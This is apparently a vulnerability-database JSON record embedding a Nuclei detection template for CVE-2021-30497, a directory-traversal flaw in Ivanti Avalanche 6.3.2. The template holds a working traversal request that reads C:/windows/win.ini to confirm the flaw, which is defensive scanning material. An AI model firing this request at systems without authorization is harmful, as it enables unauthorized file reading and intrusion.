{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-30497/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-30497/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-30497/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-30497/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-30497/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-30497"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-30497"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-30497.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2021-30497\n\ninfo:\n  name: Ivanti Avalanche 6.3.2 - Local File Inclusion\n  author: gy741\n  severity: high\n  description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.\n  remediation: |\n    Apply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2.\n  reference:\n    - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/\n    - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US\n    - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30497\n    - https://github.com/StarCrossPortal/scalpel\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-30497\n    cwe-id: CWE-22\n    epss-score: 0.9658\n    epss-percentile: 0.99882\n    cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:*\n  metadata:\n    max-request: 1\n    vendor: ivanti\n    product: avalanche\n    framework: windows\n  tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"for 16-bit app support\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200f00d44782186ecd06f240bf6886783252b700be263db0caab8df662742bb7c8022100ea8cb84284efda8750927654e20eca62caa247ef2abf7e2b7c1dfdff3c8b199e:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-30497"
}